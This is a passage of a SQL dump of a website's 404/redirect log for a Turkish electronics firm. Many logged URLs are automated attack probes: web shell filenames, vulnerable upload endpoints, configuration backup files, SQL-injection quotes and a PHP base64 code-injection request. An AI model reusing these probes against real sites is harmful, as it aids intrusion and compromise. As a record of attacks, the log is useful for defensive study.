00:00:00',301),(22679,'http://www.3s-technologies.com.tr/tr/&clkt=626&bg=!0dkl0spenykdejzb6-ccaaabfliaaacamqgogvzkkxeij1dvw-jlleqtyk0_uc6-bpg3gg4wy3bvqnci8djj2apdtmvuyhc-yqwu7gbwrxgtwi1tkq_sxhsmds16qwm5gtpkwemsrfeuqtq8b0xjfnjuxx8qgdestdlyfwxczhl_5fgozgi7rkhur5ra6uctroosxjrjsvljrkir4uox07khbktgdvhaqti4h9tbxgdl7hg8swvhd-gt-zlueoyukoorajh7dmxd6ziulp_-njqau8lhmasflbj9or2vycxx5zvq5dit8vpoapyvaihxxiayyqxvobr-cxi_40qkz6uthqth8onnltrvziolhmuxadskdgy6p6rllnlk-cdtmiidasi4-jhslukjgu8levb84lj3eehk9mxmgtr8v_nckunly2fkcxxp3n15y9jvshgtaw11-7zj0ixe0b5363iqep6dg0z__l1ip_7ps5op3zcc9vcyngnsnkbs3oqm33wewvnlwgmtobfq1zbqffkk9w4tjlirj1fqqvtfq7sqhlntn1rda_nhqwdynzitmuyfpknu6s3yuow4ww7sca1mgg',NULL,'https://www.google.com/','',1,0,'2019-04-14 17:18:28','0000-00-00 00:00:00',301),(22680,'http://www.3s-technologies.com.tr/en/modules/homepageadvertise2/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/homepageadvertise2/uploadimage.php','',1,0,'2019-04-15 05:40:36','0000-00-00 00:00:00',301),(22681,'http://3s-technologies.com.tr/en/blog',NULL,'http://3s-technologies.com.tr/','',39,0,'2019-04-15 18:37:03','0000-00-00 00:00:00',301),(22682,'http://www.3s-technologies.com.tr/tr/nwlccypmxxm.html',NULL,'','',1,0,'2019-04-19 04:06:45','0000-00-00 00:00:00',301),(22683,'http://3s-technologies.com.tr/tr/using-joomla/extensions/index.php/component/users?view=registration',NULL,'http://3s-technologies.com.tr/using-joomla/extensions','',14,0,'2019-04-19 20:36:07','0000-00-00 00:00:00',301),(22684,'http://3s-technologies.com.tr/tr/using-joomla/extensions/component/users?view=registration',NULL,'http://3s-technologies.com.tr/using-joomla/extensions','',14,0,'2019-04-19 20:36:08','0000-00-00 00:00:00',301),(22685,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=38&language=tr-tr',NULL,'','',27,0,'2019-04-20 14:27:51','0000-00-00 00:00:00',301),(22686,'http://3s-technologies.com.tr/en/wp-admin/install.php?step=1',NULL,'','',4,0,'2019-04-21 08:35:52','0000-00-00 00:00:00',301),(22687,'http://3s-technologies.com.tr/en/new/wp-admin/install.php?step=1',NULL,'','',2,0,'2019-04-21 08:35:53','0000-00-00 00:00:00',301),(22688,'http://3s-technologies.com.tr/en/wp/wp-admin/install.php?step=1',NULL,'','',2,0,'2019-04-21 08:35:55','0000-00-00 00:00:00',301),(22689,'http://3s-technologies.com.tr/en/wordpress/wp-admin/install.php?step=1',NULL,'','',2,0,'2019-04-21 08:35:56','0000-00-00 00:00:00',301),(22690,'http://3s-technologies.com.tr/en/new/wp-admin/setup-config.php',NULL,'','',2,0,'2019-04-21 08:36:01','0000-00-00 00:00:00',301),(22691,'http://3s-technologies.com.tr/en/wp/wp-admin/setup-config.php',NULL,'','',3,0,'2019-04-21 08:36:02','0000-00-00 00:00:00',301),(22692,'http://3s-technologies.com.tr/en/wordpress/wp-admin/setup-config.php',NULL,'','',7,0,'2019-04-21 08:36:03','0000-00-00 00:00:00',301),(22693,'http://3s-technologies.com.tr/tr/configuration.php.save',NULL,'','',3,0,'2019-04-23 12:40:38','0000-00-00 00:00:00',301),(22694,'http://3s-technologies.com.tr/tr/configuration.php.swp',NULL,'','',1,0,'2019-04-23 12:40:39','0000-00-00 00:00:00',301),(22695,'http://3s-technologies.com.tr/tr/configuration.php.swo',NULL,'','',1,0,'2019-04-23 12:40:39','0000-00-00 00:00:00',301),(22696,'http://3s-technologies.com.tr/tr/configuration.php.old',NULL,'','',2,0,'2019-04-23 12:40:40','0000-00-00 00:00:00',301),(22697,'http://3s-technologies.com.tr/tr/,31.210.75.230',NULL,'','',4,0,'2019-04-23 21:10:58','0000-00-00 00:00:00',301),(22698,'http://www.3s-technologies.com.tr/en/modules/namamodule/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/namamodule/uploadimage.php','',1,0,'2019-04-25 12:48:58','0000-00-00 00:00:00',301),(22699,'http://3s-technologies.com.tr/flex2gateway/amf',NULL,'','',2,0,'2019-04-25 14:10:06','0000-00-00 00:00:00',301),(22700,'http://3s-technologies.com.tr/tr/images/slideshow/0-cm602_cm101.jpg',NULL,'http://3s-technologies.com.tr/tr/','',11,0,'2019-04-25 19:22:29','0000-00-00 00:00:00',301),(22701,'http://3s-technologies.com.tr/tr/images/logo/logo-3s.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:29','0000-00-00 00:00:00',301),(22702,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_300x300.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:30','0000-00-00 00:00:00',301),(22703,'http://3s-technologies.com.tr/tr/images/panasonic/am100.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:30','0000-00-00 00:00:00',301),(22704,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/images/pause.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:30','0000-00-00 00:00:00',301),(22705,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/images/next.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:33','0000-00-00 00:00:00',301),(22706,'http://3s-technologies.com.tr/tr/templates/beez5/images/plus.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:33','0000-00-00 00:00:00',301),(22707,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_300x300.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:33','0000-00-00 00:00:00',301),(22708,'http://3s-technologies.com.tr/tr/images/slideshow/90-aqua.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22709,'http://3s-technologies.com.tr/tr/media/mod_languages/images/tr.gif',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22710,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/images/prev.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22711,'http://3s-technologies.com.tr/tr/images/slideshow/80-sp18_av3.jpg',NULL,'http://3s-technologies.com.tr/tr/','',49,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22712,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_300x300.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22713,'http://3s-technologies.com.tr/tr/images/ddm/le40v.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22714,'http://3s-technologies.com.tr/tr/images/slideshow/95-av132.jpg',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22715,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/images/play.png',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22716,'http://3s-technologies.com.tr/tr/media/mod_languages/images/en.gif',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-04-25 19:22:34','0000-00-00 00:00:00',301),(22717,'http://www.3s-technologies.com.tr/tr/qfyrwgpwxw.html',NULL,'','',1,0,'2019-04-26 03:06:13','0000-00-00 00:00:00',301),(22718,'http://3s-technologies.com.tr/en/plugins/content/apismtp/wolfis.php',NULL,'','',1,0,'2019-04-26 23:18:28','0000-00-00 00:00:00',301),(22719,'https://www.3s-technologies.com.tr/tr/wp-login.php',NULL,'http://www.google.com.hk','',9,0,'2019-04-27 02:50:47','0000-00-00 00:00:00',301),(22720,'https://www.3s-technologies.com.tr/tr/wordpress/wp-login.php',NULL,'http://www.google.com.hk','',1,0,'2019-04-27 02:52:17','0000-00-00 00:00:00',301),(22721,'http://3s-technologies.com.tr/tr/xujlcadcetk.html',NULL,'','',1,0,'2019-04-27 02:58:05','0000-00-00 00:00:00',301),(22722,'http://3s-technologies.com.tr/tr//index.php?option=com_fireboard&itemid=0&id=1&catid=0&func=fb_pdf\'',NULL,'','',1,0,'2019-04-30 23:35:09','0000-00-00 00:00:00',301),(22723,'http://www.3s-technologies.com.tr/tr/nbcmvvjzoqqlpjrx.html',NULL,'','',1,0,'2019-05-03 02:03:36','0000-00-00 00:00:00',301),(22724,'http://3s-technologies.com.tr/en/11111111111111111112222cts/',NULL,'http://3s-technologies.com.tr/en/11111111111111111112222cts/','',1,0,'2019-05-03 06:06:24','0000-00-00 00:00:00',301),(22725,'http://3s-technologies.com.tr/tr/ana-sayfa\"',NULL,'','',1,0,'2019-05-03 18:08:28','0000-00-00 00:00:00',301),(22726,'http://3s-technologies.com.tr/en/home-en\"',NULL,'','',1,0,'2019-05-03 18:08:29','0000-00-00 00:00:00',301),(22727,'http://3s-technologies.com.tr/en/\"',NULL,'','',1,0,'2019-05-03 18:08:32','0000-00-00 00:00:00',301),(22728,'http://3s-technologies.com.tr/en/home-en2121121121212.1',NULL,'','',1,0,'2019-05-03 18:08:38','0000-00-00 00:00:00',301),(22729,'http://3s-technologies.com.tr/tr/ana-sayfa2121121121212.1',NULL,'','',1,0,'2019-05-03 18:08:40','0000-00-00 00:00:00',301),(22730,'http://3s-technologies.com.tr/en/2121121121212.1',NULL,'','',1,0,'2019-05-03 18:08:43','0000-00-00 00:00:00',301),(22731,'http://3s-technologies.com.tr/tr/ttehcafaz.html',NULL,'','',1,0,'2019-05-04 01:53:56','0000-00-00 00:00:00',301),(22732,'http://www.3s-technologies.com.tr/en/?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&itemid=0',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','',1,0,'2019-05-05 07:33:28','0000-00-00 00:00:00',301),(22733,'http://www.3s-technologies.com.tr/en/?option=com_kunena',NULL,'','',6,0,'2019-05-05 23:57:08','0000-00-00 00:00:00',301),(22734,'http://3s-technologies.com.tr/tr/shop/index.php?l=page_view&p=advanced_search',NULL,'','',1,0,'2019-05-07 01:09:25','0000-00-00 00:00:00',301),(22735,'http://3s-technologies.com.tr/tr/ss/index.php?l=page_view&p=advanced_search',NULL,'','',1,0,'2019-05-07 01:09:26','0000-00-00 00:00:00',301),(22736,'http://3s-technologies.com.tr/tr/sunshop/index.php?l=page_view&p=advanced_search',NULL,'','',1,0,'2019-05-07 01:09:27','0000-00-00 00:00:00',301),(22737,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z',NULL,'','',6,0,'2019-05-07 20:33:57','0000-00-00 00:00:00',301),(22738,'http://www.3s-technologies.com.tr/en/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','',1,0,'2019-05-08 05:57:11','0000-00-00 00:00:00',301),(22739,'http://www.3s-technologies.com.tr/tr/en/products-en/user',NULL,'http://www.3s-technologies.com.tr/en/products-en/user','',1,0,'2019-05-08 23:46:35','0000-00-00 00:00:00',301),(22740,'http://www.3s-technologies.com.tr/tr/krreyfrcxtaf.html',NULL,'','',1,0,'2019-05-10 01:04:40','0000-00-00 00:00:00',301),(22741,'http://3s-technologies.com.tr/tr/ozipsniri.html',NULL,'','',1,0,'2019-05-11 00:56:34','0000-00-00 00:00:00',301),(22742,'http://www.3s-technologies.com.tr/en/post-a-job',NULL,'http://www.3s-technologies.com.tr/post-a-job/','',1,0,'2019-05-11 04:40:49','0000-00-00 00:00:00',301),(22743,'http://3s-technologies.com.tr/tr/cms/wp-login.php',NULL,'http://3s-technologies.com.tr/cms/wp-login.php','',7,0,'2019-05-11 15:30:24','0000-00-00 00:00:00',301),(22744,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/dirdesc?language=tr-tr((\'.,.&keyword=',NULL,'','',1,0,'2019-05-11 16:47:25','0000-00-00 00:00:00',301),(22745,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,product_name?language=tr-tr((\'.,.&keyword=',NULL,'','',1,0,'2019-05-11 16:47:25','0000-00-00 00:00:00',301),(22746,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/by,category_name?language=tr-tr((\'.,.&keyword=',NULL,'','',1,0,'2019-05-11 16:47:25','0000-00-00 00:00:00',301),(22747,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,category_name?language=tr-tr((\'.,.&keyword=',NULL,'','',1,0,'2019-05-11 16:47:25','0000-00-00 00:00:00',301),(22748,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,product_name?language=tr-tr&keyword=((\'.,.',NULL,'','',1,0,'2019-05-11 16:47:26','0000-00-00 00:00:00',301),(22749,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/dirdesc?language=tr-tr&keyword=((\'.,.',NULL,'','',1,0,'2019-05-11 16:47:26','0000-00-00 00:00:00',301),(22750,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,category_name?language=tr-tr&keyword=((\'.,.',NULL,'','',1,0,'2019-05-11 16:47:26','0000-00-00 00:00:00',301),(22751,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/by,category_name?language=tr-tr&keyword=((\'.,.',NULL,'','',1,0,'2019-05-11 16:47:26','0000-00-00 00:00:00',301),(22752,'http://3s-technologies.com.tr/tr/app',NULL,'','',3,0,'2019-05-11 18:14:06','0000-00-00 00:00:00',301),(22753,'http://www.3s-technologies.com.tr/en/wp-content/uploads/levoslideshow/1_uploadfolder/big',NULL,'http://www.3s-technologies.com.tr/wp-content/uploads/levoslideshow/1_uploadfolder/big/','',1,0,'2019-05-12 13:34:16','0000-00-00 00:00:00',301),(22754,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/en/products-en/user',NULL,'http://www.3s-technologies.com.tr/en/products-en/user','',2,0,'2019-05-14 04:30:10','0000-00-00 00:00:00',301),(22755,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2019-05-14 11:39:15','0000-00-00 00:00:00',301),(22756,'http://3s-technologies.com.tr/en/server/php',NULL,'http://3s-technologies.com.tr/server/php/','',4,0,'2019-05-16 03:56:27','0000-00-00 00:00:00',301),(22757,'http://3s-technologies.com.tr/en/mjfyifwwaghjxr/dlbjqfuextcgd/ul4hj6fyqs7r/sdfa8vyaqzzl2yqteq',NULL,'','',1,0,'2019-05-16 06:32:03','0000-00-00 00:00:00',301),(22758,'http://3s-technologies.com.tr/en/11111cts/',NULL,'http://3s-technologies.com.tr/en/11111cts/','',1,0,'2019-05-16 10:18:33','0000-00-00 00:00:00',301),(22759,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-homepage-slideshow/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-homepage-slideshow/readme.txt','',1,0,'2019-05-16 23:21:30','0000-00-00 00:00:00',301),(22760,'http://www.3s-technologies.com.tr/tr/cnpeiuohkzxwlkhn.html',NULL,'','',1,0,'2019-05-17 00:03:38','0000-00-00 00:00:00',301),(22761,'http://www.3s-technologies.com.tr/en/http:/brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://www.3s-technologies.com.tr/http://brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',2,0,'2019-05-17 09:47:00','0000-00-00 00:00:00',301),(22762,'http://3s-technologies.com.tr/en/http:/brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://3s-technologies.com.tr/http://brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2019-05-17 09:48:25','0000-00-00 00:00:00',301),(22763,'http://3s-technologies.com.tr/tr/yqcqzgqblzypbf.html',NULL,'','',1,0,'2019-05-17 23:54:36','0000-00-00 00:00:00',301),(22764,'http://www.3s-technologies.com.tr/tr/wso.php',NULL,'','',64,0,'2019-05-18 06:40:55','0000-00-00 00:00:00',301),(22765,'http://www.3s-technologies.com.tr/tr/modules/modules/modules.php',NULL,'','',15,0,'2019-05-18 06:40:57','0000-00-00 00:00:00',301),(22766,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',16,0,'2019-05-18 06:40:59','0000-00-00 00:00:00',301),(22767,'http://www.3s-technologies.com.tr/tr/libraries/joomla/css.php',NULL,'','',15,0,'2019-05-18 06:41:03','0000-00-00 00:00:00',301),(22768,'http://www.3s-technologies.com.tr/tr/libraries/joomla/jmails.php?u',NULL,'','',15,0,'2019-05-18 06:41:05','0000-00-00 00:00:00',301),(22769,'http://www.3s-technologies.com.tr/tr/marvins.php',NULL,'','',17,0,'2019-05-18 06:41:15','0000-00-00 00:00:00',301),(22770,'http://www.3s-technologies.com.tr/tr/olux.php',NULL,'','',38,0,'2019-05-18 06:41:20','0000-00-00 00:00:00',301),(22771,'http://www.3s-technologies.com.tr/tr/indoxploit.php',NULL,'','',46,0,'2019-05-18 06:41:22','0000-00-00 00:00:00',301),(22772,'http://www.3s-technologies.com.tr/tr/v3.php',NULL,'','',26,0,'2019-05-18 06:41:32','0000-00-00 00:00:00',301),(22773,'http://www.3s-technologies.com.tr/tr/v5.php',NULL,'','',30,0,'2019-05-18 06:41:34','0000-00-00 00:00:00',301),(22774,'http://www.3s-technologies.com.tr/tr/upload.php',NULL,'','',42,0,'2019-05-18 06:41:44','0000-00-00 00:00:00',301),(22775,'http://www.3s-technologies.com.tr/tr/templates/beez/index.php',NULL,'','',18,0,'2019-05-18 06:41:56','0000-00-00 00:00:00',301),(22776,'http://www.3s-technologies.com.tr/tr/templates/ja_purity/index.php',NULL,'','',15,0,'2019-05-18 06:41:58','0000-00-00 00:00:00',301),(22777,'http://www.3s-technologies.com.tr/tr/templates/rhuk_milkyway/index.php',NULL,'','',15,0,'2019-05-18 06:42:01','0000-00-00 00:00:00',301),(22778,'http://3s-technologies.com.tr/en/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',1,0,'2019-05-18 08:00:53','0000-00-00 00:00:00',301),(22779,'http://www.3s-technologies.com.tr/en/the-joomla-project\'a=0',NULL,'http://www.3s-technologies.com.tr/en/the-joomla-project\'A=0','',1,0,'2019-05-18 13:00:05','0000-00-00 00:00:00',301),(22780,'http://3s-technologies.com.tr/en/?option=com_kunena',NULL,'','',2,0,'2019-05-19 02:21:06','0000-00-00 00:00:00',301),(22781,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',3,0,'2019-05-20 02:29:48','0000-00-00 00:00:00',301),(22782,'http://www.3s-technologies.com.tr/tr/images/box1.png',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',3,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22783,'http://www.3s-technologies.com.tr/tr/images/vmgeneral/arrow_down.png',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',1,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22784,'http://www.3s-technologies.com.tr/tr/images/header_outer.jpg',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',3,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22785,'http://www.3s-technologies.com.tr/tr/images/arrow1.gif',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',3,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22786,'http://www.3s-technologies.com.tr/tr/images/karo.gif',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',3,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22787,'http://www.3s-technologies.com.tr/tr/images/vmgeneral/quantity-controls.png',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',1,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22788,'http://www.3s-technologies.com.tr/tr/images/vmgeneral/backgrounds.png',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',1,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22789,'http://www.3s-technologies.com.tr/tr/images/footer.jpg',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',1,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22790,'http://www.3s-technologies.com.tr/tr/images/tabs_back.png',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-f%C4%B1r%C4%B1n','',3,0,'2019-05-20 17:35:38','0000-00-00 00:00:00',301),(22791,'http://3s-technologies.com.tr/en/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt','',1,0,'2019-05-21 00:42:23','0000-00-00 00:00:00',301),(22792,'http://3s-technologies.com.tr/en/wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css','',1,0,'2019-05-21 10:25:30','0000-00-00 00:00:00',301),(22793,'https://3s-technologies.com.tr/en//images/logo/logo-3s.jpg',NULL,'','',44,0,'2019-05-21 18:50:35','0000-00-00 00:00:00',301),(22794,'http://3s-technologies.com.tr/tr/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-22 03:40:14','0000-00-00 00:00:00',301),(22795,'http://3s-technologies.com.tr/tr/cache/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-22 03:40:20','0000-00-00 00:00:00',301),(22796,'http://3s-technologies.com.tr/tr/plugins/system/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-22 03:40:27','0000-00-00 00:00:00',301),(22797,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-vertical-gallery/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-vertical-gallery/readme.txt','',2,0,'2019-05-22 13:11:05','0000-00-00 00:00:00',301),(22798,'http://3s-technologies.com.tr/tr/?option=com_k2&view=item&id=1',NULL,'','',1,0,'2019-05-22 21:17:23','0000-00-00 00:00:00',301),(22799,'http://www.3s-technologies.com.tr/en/modules/mod_artuploader/upload.php',NULL,'http://www.3s-technologies.com.tr/modules/mod_artuploader/upload.php','',2,0,'2019-05-23 01:28:38','0000-00-00 00:00:00',301),(22800,'http://3s-technologies.com.tr/en/modules/mod_artuploader/upload.php',NULL,'http://3s-technologies.com.tr/modules/mod_artuploader/upload.php','',1,0,'2019-05-23 01:31:16','0000-00-00 00:00:00',301),(22801,'http://www.3s-technologies.com.tr/tr/osatwekbhcpwbcin.html',NULL,'','',1,0,'2019-05-23 22:58:40','0000-00-00 00:00:00',301),(22802,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-mobile-detector/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-mobile-detector/readme.txt','',1,0,'2019-05-24 00:54:29','0000-00-00 00:00:00',301),(22803,'http://3s-technologies.com.tr/en/wp-content/plugins/fluid_forms/file-upload/server/php/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','',1,0,'2019-05-24 15:06:02','0000-00-00 00:00:00',301),(22804,'http://3s-technologies.com.tr/tr/oaxjrlyalsgyot.html',NULL,'','',1,0,'2019-05-24 22:49:24','0000-00-00 00:00:00',301),(22805,'http://3s-technologies.com.tr/en/wp-content/plugins/wpstorecart/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wpstorecart/readme.txt','',2,0,'2019-05-25 00:13:05','0000-00-00 00:00:00',301),(22806,'http://3s-technologies.com.tr/tr/hakk',NULL,'http://3s-technologies.com.tr/tr/','',31,0,'2019-05-25 05:10:22','0000-00-00 00:00:00',301),(22807,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-dreamworkgallery/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-dreamworkgallery/readme.txt','',1,0,'2019-05-25 08:45:35','0000-00-00 00:00:00',301),(22808,'http://3s-technologies.com.tr/en/wp-content/plugins/gravityforms',NULL,'http://3s-technologies.com.tr/wp-content/plugins/gravityforms/','',2,0,'2019-05-26 03:16:19','0000-00-00 00:00:00',301),(22809,'http://3s-technologies.com.tr/en/wp-content/plugins/simple-ads-manager/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/simple-ads-manager/readme.txt','',1,0,'2019-05-27 02:23:58','0000-00-00 00:00:00',301),(22810,'http://3s-technologies.com.tr/en/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',3,0,'2019-05-27 16:52:09','0000-00-00 00:00:00',301),(22811,'http://3s-technologies.com.tr/plugins/content/apismtp/apismtp.php',NULL,'','',1,0,'2019-05-28 04:06:11','0000-00-00 00:00:00',301),(22812,'http://3s-technologies.com.tr/en/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js','',1,0,'2019-05-28 04:38:47','0000-00-00 00:00:00',301),(22813,'http://www.3s-technologies.com.tr/tr/?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme',NULL,'','',1,0,'2019-05-28 23:25:16','0000-00-00 00:00:00',301),(22814,'http://3s-technologies.com.tr/en/?option=com_contact&view=contact&id=10',NULL,'','',1,0,'2019-05-29 09:54:16','0000-00-00 00:00:00',301),(22815,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=35&language=tr-tr',NULL,'','',25,0,'2019-05-29 13:54:04','0000-00-00 00:00:00',301),(22816,'http://3s-technologies.com.tr/tr/admin_files',NULL,'','',1,0,'2019-05-29 22:43:18','0000-00-00 00:00:00',301),(22817,'http://3s-technologies.com.tr/en/wp-content/themes/atom/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/atom/uploadify/uploadify.css','',1,0,'2019-05-30 03:30:36','0000-00-00 00:00:00',301),(22818,'http://3s-technologies.com.tr/en/wp-content/themes/satoshi/upload-file.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/satoshi/upload-file.php','',1,0,'2019-05-30 04:08:18','0000-00-00 00:00:00',301),(22819,'http://www.3s-technologies.com.tr/en/wp-content/themes/atom/uploadify/uploadify.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/atom/uploadify/uploadify.css','',2,0,'2019-05-30 09:25:15','0000-00-00 00:00:00',301),(22820,'http://www.3s-technologies.com.tr/tr/components/rxr_1559232510.php',NULL,'','',8,0,'2019-05-30 18:26:42','0000-00-00 00:00:00',301),(22821,'http://www.3s-technologies.com.tr/tr/wburzwzny.html',NULL,'','',1,0,'2019-05-30 22:44:56','0000-00-00 00:00:00',301),(22822,'http://3s-technologies.com.tr/en/wp-content/themes/headway-162/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-162/style.css','',2,0,'2019-05-31 01:45:51','0000-00-00 00:00:00',301),(22823,'http://3s-technologies.com.tr/en/wp-content/themes/ut-strange/addpress/css/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/ut-strange/addpress/css/style.css','',1,0,'2019-05-31 01:51:41','0000-00-00 00:00:00',301),(22824,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?view=article&id=48:mx400&catid=36:orta-hizli&itemid=69&option=com_content2121121121212.1',NULL,'','',20,0,'2019-05-31 02:43:38','0000-00-00 00:00:00',301),(22825,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com_content&id=48:mx400&catid=36:orta-hizli&itemid=69&view=article2121121121212.1',NULL,'','',19,0,'2019-05-31 02:43:42','0000-00-00 00:00:00',301),(22826,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-201/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-201/style.css','',2,0,'2019-05-31 14:30:57','0000-00-00 